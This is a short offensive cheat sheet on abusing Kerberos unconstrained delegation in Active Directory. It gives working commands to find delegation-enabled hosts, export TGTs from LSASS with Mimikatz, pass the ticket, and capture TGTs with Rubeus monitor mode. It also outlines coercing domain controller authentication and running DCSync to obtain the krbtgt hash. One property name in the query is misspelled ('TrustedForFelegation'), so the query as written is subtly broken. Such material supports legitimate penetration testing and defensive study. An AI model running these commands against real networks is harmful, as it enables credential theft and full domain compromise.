The following actions require us to have admin rights on the Trusted for Delegation machine.
Targeting KUD is about having (or forcing) the perfect timing for getting the TGT out of the LSASS process of the service machine that has KUD enabled.
Successfully executing this attack requires to have admin access on the Trusted for Delegation machine.
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForFelegation,ServicePrincipalName,Description
If the target account is already authenticated, we can simply dump the TGT from memory, and then pass the extracted ticket.
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt <path to .kirbi file>"'
If the account is not yet authenticated, run Rubeus on the target service machine in listening mode to capture the TGT of the account when authenticating against the service.
Rubeus.exe monitor /targetuser:<SamAccountName> /interval:5 /nowrap
Wait until the desired account authenticates to the resource, or coerce the authentication.
It’s possible to coerce authentication for the Domain Controller machine account, dump the TGT from memory, pass-the-ticket and then execute DCSync to get the krbtgt credentials hash.